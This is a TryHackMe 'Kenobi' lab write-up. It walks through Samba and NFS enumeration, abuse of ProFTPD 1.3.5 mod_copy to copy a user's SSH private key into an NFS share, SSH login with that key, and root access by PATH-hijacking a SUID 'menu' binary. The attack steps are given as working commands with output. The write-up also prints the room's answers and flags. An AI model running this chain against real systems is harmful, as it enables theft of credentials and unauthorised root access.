TryHackMe - Kenobi - Writeup
Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
NMAP Scan
root@ip-10-10-207-9:~# nmap -sC -sV -A 10.10.207.215
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:23 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00078s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 49912/udp mountd
| 100005 1,2,3 58881/tcp mountd
| 100021 1,3,4 36376/udp nlockmgr
| 100021 1,3,4 39717/tcp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2021-05-06T13:24:10-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-06 19:24:10
|_ start_date: 1600-12-31 23:58:45
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.12 seconds
Enumerating Samba for shares
root@ip-10-10-207-9:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.207.215
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:39 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.207.215\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.207.215\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.207.215\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds
Using the nmap command above, how many shares have been found?
Answer: 3
root@ip-10-10-207-9:~# smbclient //10.10.207.215/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 11:49:09 2019
.. D 0 Wed Sep 4 11:56:07 2019
log.txt N 12237 Wed Sep 4 11:49:09 2019
9204224 blocks of size 1024. 6703228 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (2987.5 KiloBytes/sec) (average 2987.5 KiloBytes/sec)
smb: \>
Once you’re connected, list the files on the share. What is the file can you see?
Answer: log.txt
What port is FTP running on?
Answer: 21
root@ip-10-10-207-9:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.207.215
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:51 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 2010404.0 6703224.0 24% 16.0T 32000
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
What mount can we see?
Answer: /var
Gain initial access with ProFtpd
What is the version?
Answer: 1.3.5
root@ip-10-10-207-9:~# searchsploit proftpd 1.3.5
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
How many exploits are there for the ProFTPd running?
Answer: 3
root@ip-10-10-207-9:~# nc 10.10.207.215 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.207.215]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
root@ip-10-10-207-9:~# mkdir /mnt/kenobiNFS
root@ip-10-10-207-9:~# mount 10.10.207.215:/var /mnt/kenobiNFS
root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS
root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt 6 root root 4096 May 6 20:15 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 ubuntu ubuntu 1675 May 6 20:15 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 May 6 19:19 systemd-private-25feb6d12a1b4df9a4d0e2993544b880-systemd-timesyncd.service-cxdFHd
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
root@ip-10-10-207-9:~# cp /mnt/kenobiNFS/tmp/id_rsa ~
root@ip-10-10-207-9:~# ssh -i id_rsa kenobi@10.10.207.215
The authenticity of host '10.10.207.215 (10.10.207.215)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.207.215' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899
What is Kenobi’s user flag (/home/kenobi/user.txt)?
Answer: d0b0f3f53b6caa532a83915e19224899
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
What file looks particularly out of the ordinary?
Answer: /usr/bin/menu
Run the binary, how many options appear?
Answer: 3
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02
#
What is the root flag (/root/root.txt)?
Answer: 177b3cd8562289f37382721c28381f02
Thanks for reading.
Written on May 18, 2021